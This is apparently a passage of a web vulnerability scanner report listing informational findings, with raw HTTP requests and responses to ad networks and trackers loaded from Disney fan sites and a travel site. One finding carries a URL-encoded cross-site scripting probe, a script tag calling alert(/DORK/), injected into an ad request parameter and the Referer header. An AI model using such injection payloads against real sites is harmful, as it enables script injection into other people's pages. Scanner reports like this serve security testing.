http://pagead2.googlesyndication.com/pagead/js/graphics.js
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.passporterboards.com/forums/touring-world-parks-walt-disney-world/243302-enchanted-tiki-room-news.html%26hl%3Den%26client%3Dca-pub-5438710172241065%26adU%3Dwww.Onebox.com%26adT%3DOnebox%25C2%25AE%2B-%2BOfficial%2BSite%26gl%3DUS&usg=AFQjCNFSCOHT65JRxcO2VAPUhNCQFqZU1w

Request

GET /pagead/ads?client=ca-pub-5438710172241065&output=html&h=280&slotname=3081376442&w=336&lmt=1305526807&flash=10.3.181&url=http%3A%2F%2Fwww.passporterboards.com%2Fforums%2Ftouring-world-parks-walt-disney-world%2F243302-enchanted-tiki-room-news.html&dt=1305508794881&bpp=13&shv=r20110509&jsv=r20110506&prev_slotnames=9579777178%2C9579777178&correlator=1305508795096&frm=0&adk=1078039243&ga_vid=1172158137.1305508795&ga_sid=1305508795&ga_hid=1710727111&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1120&bih=902&fu=0&ifi=3&dtd=M&xpc=hsGgaorwsh&p=http%3A//www.passporterboards.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

22.41. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4339714761096906&output=html&h=280&slotname=8386713150&w=336&lmt=1305495137&flash=0&url=http%3A%2F%2Fpastebin.com%2Ffavicon.ico50732%2522%253E%253Cscript%253Ealert(%2FDORK%2F)%253C%2Fscript%253Ed0c46a64a0&dt=1305495237355&bpp=2&shv=r20110509&jsv=r20110506&correlator=1305495237402&frm=0&adk=1636607917&ga_vid=1357599510.1305495050&ga_sid=1305495050&ga_hid=552566544&ga_fc=1&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=24&u_nplug=5&u_nmime=39&biw=1121&bih=908&ref=http%3A%2F%2Fburp%2Fshow%2F4&fu=0&ifi=1&dtd=61&xpc=xnq2euyXf4&p=http%3A//pastebin.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pastebin.com/favicon.ico50732%252522%25253E%25253Cscript%25253Ealert(/DORK/)%25253C/script%25253Ed0c46a64a0%26hl%3Den%26client%3Dca-pub-4339714761096906%26adU%3Dwww.LendingTree.com%26adT%3DLendingTree%25C2%25AEOfficial%2BSite%26adU%3Dwww.Moxiesoft.com%26adT%3DKnowledge%2BBase%2BSoftware%26adU%3Dwww.LowerMyBills.com%26adT%3DSee%2BTodays%2BMortgage%2BRates%26adU%3DElove.com%26adT%3DMature%2BMatchmaking%2BAgency%26gl%3DUS&usg=AFQjCNH4tQltKxtpnWIlSc3vOG985wyfiA

Request

GET /pagead/ads?client=ca-pub-4339714761096906&output=html&h=280&slotname=8386713150&w=336&lmt=1305495137&flash=0&url=http%3A%2F%2Fpastebin.com%2Ffavicon.ico50732%2522%253E%253Cscript%253Ealert(%2FDORK%2F)%253C%2Fscript%253Ed0c46a64a0&dt=1305495237355&bpp=2&shv=r20110509&jsv=r20110506&correlator=1305495237402&frm=0&adk=1636607917&ga_vid=1357599510.1305495050&ga_sid=1305495050&ga_hid=552566544&ga_fc=1&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=24&u_nplug=5&u_nmime=39&biw=1121&bih=908&ref=http%3A%2F%2Fburp%2Fshow%2F4&fu=0&ifi=1&dtd=61&xpc=xnq2euyXf4&p=http%3A//pastebin.com HTTP/1.1
Host: googleads.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://pastebin.com/favicon.ico50732%22%3E%3Cscript%3Ealert(/DORK/)%3C/script%3Ed0c46a64a0
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 15 May 2011 21:33:58 GMT
Server: cafe
Cache-Control: private
Content-Length: 14163
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#0066cc}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
<div style="right:2px;position:absolute;top:2px"><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pastebin.com/favicon.ico50732%252522%25253E%25253Cscript%25253Ealert(/DORK/)%25253C/script%25253Ed0c46a64a0%26hl%3Den%26client%3Dca-pub-4339714761096906%26adU%3Dwww.LendingTree.com%26adT%3DLendingTree%25C2%25AEOfficial%2BSite%26adU%3Dwww.Moxiesoft.com%26adT%3DKnowledge%2BBase%2BSoftware%26adU%3Dwww.LowerMyBills.com%26adT%3DSee%2BTodays%2BMortgage%2BRates%26adU%3DElove.com%26adT%3DMature%2BMatchmaking%2BAgency%26gl%3DUS&usg=AFQjCNH4tQltKxtpnWIlSc3vOG985wyfiA" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" ></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

22.42. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5438710172241065&output=html&h=60&slotname=9579777178&w=468&lmt=1305526795&flash=10.3.181&url=http%3A%2F%2Fwww.passporterboards.com%2Fforums%2Ftouring-world-parks-walt-disney-world%2F243302-enchanted-tiki-room-news.html&dt=1305508794635&bpp=16&shv=r20110509&jsv=r20110506&correlator=1305508795096&frm=0&adk=3560483373&ga_vid=1172158137.1305508795&ga_sid=1305508795&ga_hid=1710727111&ga_fc=1&ga_wpids=UA-1266074-2&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1120&bih=902&fu=0&ifi=1&dtd=M&xpc=EMGeJJUI8o&p=http%3A//www.passporterboards.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png
http://pagead2.googlesyndication.com/pagead/images/i.png
http://pagead2.googlesyndication.com/pagead/js/abg.js
http://pagead2.googlesyndication.com/pagead/js/graphics.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.passporterboards.com/forums/touring-world-parks-walt-disney-world/243302-enchanted-tiki-room-news.html%26hl%3Den%26client%3Dca-pub-5438710172241065%26adU%3Dwww.Capella.edu%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNHF9zMT9HXiDsVHKy22RlWaaXFXOg

Request

GET /pagead/ads?client=ca-pub-5438710172241065&output=html&h=60&slotname=9579777178&w=468&lmt=1305526795&flash=10.3.181&url=http%3A%2F%2Fwww.passporterboards.com%2Fforums%2Ftouring-world-parks-walt-disney-world%2F243302-enchanted-tiki-room-news.html&dt=1305508794635&bpp=16&shv=r20110509&jsv=r20110506&correlator=1305508795096&frm=0&adk=3560483373&ga_vid=1172158137.1305508795&ga_sid=1305508795&ga_hid=1710727111&ga_fc=1&ga_wpids=UA-1266074-2&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1120&bih=902&fu=0&ifi=1&dtd=M&xpc=EMGeJJUI8o&p=http%3A//www.passporterboards.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 16 May 2011 01:23:58 GMT
Server: cafe
Cache-Control: private
Content-Length: 4516
X-XSS-Protection: 1; mode=block

<html><head><style></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.passporterboards.com/forums/touring-world-parks-walt-disney-world/243302-enchanted-tiki-room-news.html%26hl%3Den%26client%3Dca-pub-5438710172241065%26adU%3Dwww.Capella.edu%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNHF9zMT9HXiDsVHKy22RlWaaXFXOg" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

22.43. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-0869015232451249&output=html&h=60&slotname=2513726328&w=468&lmt=1305527323&flash=10.3.181&url=http%3A%2F%2Fwww.magicalkingdoms.com%2Fblog%2Fcategory%2Fdisneyland-paris%2F&dt=1305509317323&bpp=2&shv=r20110509&jsv=r20110506&prev_slotnames=2513726328%2C2513726328&correlator=1305509318525&frm=0&adk=1602865645&ga_vid=424582120.1305508808&ga_sid=1305508808&ga_hid=1569636899&ga_fc=1&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1120&bih=902&ref=http%3A%2F%2Fwww.magicalkingdoms.com%2Fblog%2F2011%2F05%2F09%2Fthe-dream-differences-on-disney-cruise-line%2F&fu=0&ifi=3&dtd=5943&xpc=ldmrd8voBK&p=http%3A//www.magicalkingdoms.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/js/graphics.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.magicalkingdoms.com/blog/category/disneyland-paris/%26hl%3Den%26client%3Dca-pub-0869015232451249%26adU%3DUniversalOrlando.com/BuyTicketsNow%26adT%3DUniversal%2BOrlando%2BTickets%26adU%3Dgrad.towson.edu/%26adT%3DHomeland%2BSecurity%2BProgram%26gl%3DUS&usg=AFQjCNEFxruGcWQUM0fr-jHvszxgIsmwaA

Request

GET /pagead/ads?client=ca-pub-0869015232451249&output=html&h=60&slotname=2513726328&w=468&lmt=1305527323&flash=10.3.181&url=http%3A%2F%2Fwww.magicalkingdoms.com%2Fblog%2Fcategory%2Fdisneyland-paris%2F&dt=1305509317323&bpp=2&shv=r20110509&jsv=r20110506&prev_slotnames=2513726328%2C2513726328&correlator=1305509318525&frm=0&adk=1602865645&ga_vid=424582120.1305508808&ga_sid=1305508808&ga_hid=1569636899&ga_fc=1&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1120&bih=902&ref=http%3A%2F%2Fwww.magicalkingdoms.com%2Fblog%2F2011%2F05%2F09%2Fthe-dream-differences-on-disney-cruise-line%2F&fu=0&ifi=3&dtd=5943&xpc=ldmrd8voBK&p=http%3A//www.magicalkingdoms.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

22.44. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-0869015232451249&output=html&h=60&slotname=2513726328&w=468&lmt=1305527318&flash=10.3.181&url=http%3A%2F%2Fwww.magicalkingdoms.com%2Fblog%2Fcategory%2Fdisneyland-paris%2F&dt=1305509317310&bpp=5&shv=r20110509&jsv=r20110506&correlator=1305509318525&frm=0&adk=1602865645&ga_vid=424582120.1305508808&ga_sid=1305508808&ga_hid=1569636899&ga_fc=1&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1120&bih=902&ref=http%3A%2F%2Fwww.magicalkingdoms.com%2Fblog%2F2011%2F05%2F09%2Fthe-dream-differences-on-disney-cruise-line%2F&fu=0&ifi=1&dtd=2372&xpc=guhhW64Hiv&p=http%3A//www.magicalkingdoms.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/js/graphics.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.magicalkingdoms.com/blog/category/disneyland-paris/%26hl%3Den%26client%3Dca-pub-0869015232451249%26adU%3DTESST.com/Network-Info-Systems%26adT%3DTESST%2Bin%2BTowson%26adU%3DDisneyVacations.com%26adT%3DDisneyland%25C2%25AE%2BPackages%26gl%3DUS&usg=AFQjCNHlexQj_GmOg_SBfJhdFlpjLzsvCg

Request

GET /pagead/ads?client=ca-pub-0869015232451249&output=html&h=60&slotname=2513726328&w=468&lmt=1305527318&flash=10.3.181&url=http%3A%2F%2Fwww.magicalkingdoms.com%2Fblog%2Fcategory%2Fdisneyland-paris%2F&dt=1305509317310&bpp=5&shv=r20110509&jsv=r20110506&correlator=1305509318525&frm=0&adk=1602865645&ga_vid=424582120.1305508808&ga_sid=1305508808&ga_hid=1569636899&ga_fc=1&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1120&bih=902&ref=http%3A%2F%2Fwww.magicalkingdoms.com%2Fblog%2F2011%2F05%2F09%2Fthe-dream-differences-on-disney-cruise-line%2F&fu=0&ifi=1&dtd=2372&xpc=guhhW64Hiv&p=http%3A//www.magicalkingdoms.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

22.45. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-0869015232451249&output=html&h=60&slotname=2513726328&w=468&lmt=1305527323&flash=10.3.181&url=http%3A%2F%2Fwww.magicalkingdoms.com%2Fblog%2Fcategory%2Fdisneyland-paris%2F&dt=1305509317319&bpp=2&shv=r20110509&jsv=r20110506&prev_slotnames=2513726328&correlator=1305509318525&frm=0&adk=1602865645&ga_vid=424582120.1305508808&ga_sid=1305508808&ga_hid=1569636899&ga_fc=1&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1120&bih=902&ref=http%3A%2F%2Fwww.magicalkingdoms.com%2Fblog%2F2011%2F05%2F09%2Fthe-dream-differences-on-disney-cruise-line%2F&fu=0&ifi=2&dtd=5881&xpc=Tzz2K5jJY6&p=http%3A//www.magicalkingdoms.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/js/graphics.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.magicalkingdoms.com/blog/category/disneyland-paris/%26hl%3Den%26client%3Dca-pub-0869015232451249%26adU%3DTESST.com/Network-Info-Systems%26adT%3DTESST%2Bin%2BTowson%26adU%3Dgrad.towson.edu/%26adT%3DHomeland%2BSecurity%2BProgram%26gl%3DUS&usg=AFQjCNGvSYI8JA0eT6LZUn5qMiUUFwuClA

Request

GET /pagead/ads?client=ca-pub-0869015232451249&output=html&h=60&slotname=2513726328&w=468&lmt=1305527323&flash=10.3.181&url=http%3A%2F%2Fwww.magicalkingdoms.com%2Fblog%2Fcategory%2Fdisneyland-paris%2F&dt=1305509317319&bpp=2&shv=r20110509&jsv=r20110506&prev_slotnames=2513726328&correlator=1305509318525&frm=0&adk=1602865645&ga_vid=424582120.1305508808&ga_sid=1305508808&ga_hid=1569636899&ga_fc=1&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1120&bih=902&ref=http%3A%2F%2Fwww.magicalkingdoms.com%2Fblog%2F2011%2F05%2F09%2Fthe-dream-differences-on-disney-cruise-line%2F&fu=0&ifi=2&dtd=5881&xpc=Tzz2K5jJY6&p=http%3A//www.magicalkingdoms.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

22.46. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-0869015232451249&output=html&h=60&slotname=2513726328&w=468&lmt=1305526808&flash=10.3.181&url=http%3A%2F%2Fwww.magicalkingdoms.com%2Fblog%2F2011%2F05%2F09%2Fthe-dream-differences-on-disney-cruise-line%2F&dt=1305508808218&bpp=7&shv=r20110509&jsv=r20110506&correlator=1305508808426&frm=0&adk=3011368451&ga_vid=424582120.1305508808&ga_sid=1305508808&ga_hid=507622912&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1120&bih=902&fu=0&ifi=1&dtd=385&xpc=DjyPgIGYTV&p=http%3A//www.magicalkingdoms.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/js/graphics.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.magicalkingdoms.com/blog/2011/05/09/the-dream-differences-on-disney-cruise-line/%26hl%3Den%26client%3Dca-pub-0869015232451249%26adU%3DTESST.com/Network-Info-Systems%26adT%3DTESST%2Bin%2BTowson%26adU%3DCampusCorner.com/Forensics%26adT%3DForensics%2BTraining%2B-%2B2011%26gl%3DUS&usg=AFQjCNEwe2ocvXCKWiOdtxxY9mqzdbAgJQ

Request

GET /pagead/ads?client=ca-pub-0869015232451249&output=html&h=60&slotname=2513726328&w=468&lmt=1305526808&flash=10.3.181&url=http%3A%2F%2Fwww.magicalkingdoms.com%2Fblog%2F2011%2F05%2F09%2Fthe-dream-differences-on-disney-cruise-line%2F&dt=1305508808218&bpp=7&shv=r20110509&jsv=r20110506&correlator=1305508808426&frm=0&adk=3011368451&ga_vid=424582120.1305508808&ga_sid=1305508808&ga_hid=507622912&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1120&bih=902&fu=0&ifi=1&dtd=385&xpc=DjyPgIGYTV&p=http%3A//www.magicalkingdoms.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

22.47. http://serv.adspeed.com/ad.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://serv.adspeed.com
Path:	/ad.php

Issue detail

The page was loaded from a URL containing a query string:

http://serv.adspeed.com/ad.php?do=html&zid=3253&wd=468&ht=60&tz=5&ck=Y&jv=Y&scr=1920x1200x32&ref=&r=0.5050509925931692

The response contains the following link to another domain:

http://www.passporter.com/ads/passportersclubpurple.gif

Request

GET /ad.php?do=html&zid=3253&wd=468&ht=60&tz=5&ck=Y&jv=Y&scr=1920x1200x32&ref=&r=0.5050509925931692 HTTP/1.1
Host: serv.adspeed.com
Proxy-Connection: keep-alive
Referer: http://www.passporterboards.com/forums/touring-world-parks-walt-disney-world/243302-enchanted-tiki-room-news.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: policyref="http://serv.adspeed.com/w3c/p3p.xml", CP="NOI CUR ADM OUR NOR STA NID"
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, no-store, must-revalidate
Vary: Accept-Encoding
Content-type: text/html
Connection: close
Date: Mon, 16 May 2011 01:20:32 GMT
Server: AdSpeed/s5
Content-Length: 844

<html><head><title>PassPorter's Club</title></head><body leftmargin=0 topmargin=0 marginwidth=0 marginheight=0 style="background-color:transparent"><a href="http://serv.adspeed.com/ad.php?do=clk&aid=41759&zid=3253&t=1305508832&auth=1bc4b0fff21efa793bc70e9143135cc5" target="_top" onmouseover="window.status='PassPorter's Club'; return true;" onmouseout="window.status=''; return true;" ><img title="PassPorter's Club" style="border:0px;" src="http://www.passporter.com/ads/passportersclubpurple.gif" alt="PassPorter's Club" width="468" height="60" /></a>
...[SNIP]...

22.48. http://sony.links.channelintelligence.com/pages/prices.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sony.links.channelintelligence.com
Path:	/pages/prices.asp

Issue detail

The page was loaded from a URL containing a query string:

http://sony.links.channelintelligence.com/pages/prices.asp?nrgid=1864&ssku=98285

The response contains the following link to another domain:

http://www.google.com/jsapi?key=ABQIAAAALAUt8zpIqsKKi8uVJOCT5hTcXj1yTpET-jUI4NpZZp-xQhD5bRTE1NmjXsZ6T0eGLbSNqDOycYKq_w

Request

GET /pages/prices.asp?nrgid=1864&ssku=98285 HTTP/1.1
Host: sony.links.channelintelligence.com
Proxy-Connection: keep-alive
Referer: http://us.playstation.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: serverstamp=4B88CCEA-94CF-AEFC-64AD-028BB2019E0D

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="OTI DSP COR CURa ADMa DEVa OUR DELa STP"
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 19529
Cache-Control: public, max-age=1549
Expires: Sun, 15 May 2011 20:52:22 GMT
Date: Sun, 15 May 2011 20:26:33 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google.com/jsapi?key=ABQIAAAALAUt8zpIqsKKi8uVJOCT5hTcXj1yTpET-jUI4NpZZp-xQhD5bRTE1NmjXsZ6T0eGLbSNqDOycYKq_w"></script>
...[SNIP]...

22.49. http://track.searchignite.com/si/CM/Tracking/ClickTracking.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://track.searchignite.com
Path:	/si/CM/Tracking/ClickTracking.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://track.searchignite.com/si/CM/Tracking/ClickTracking.aspx?siclientid=3489&jscript=1

The response contains the following link to another domain:

http://dms.netmng.com/si/CM/Tracking/ClickTracking.aspx?siclientid=3489&jscript=1&u=

Request

GET /si/CM/Tracking/ClickTracking.aspx?siclientid=3489&jscript=1 HTTP/1.1
Host: track.searchignite.com
Proxy-Connection: keep-alive
Referer: http://www.travelguard.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Connection: close
Date: Mon, 16 May 2011 01:44:00 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PUB OTRo"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://dms.netmng.com/si/CM/Tracking/ClickTracking.aspx?siclientid=3489&jscript=1&u=
Cache-Control: private
Content-Type: text/html

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://dms.netmng.com/si/CM/Tracking/ClickTracking.aspx?siclientid=3489&jscript=1&u=">here</a>.</h2>
</body>
...[SNIP]...

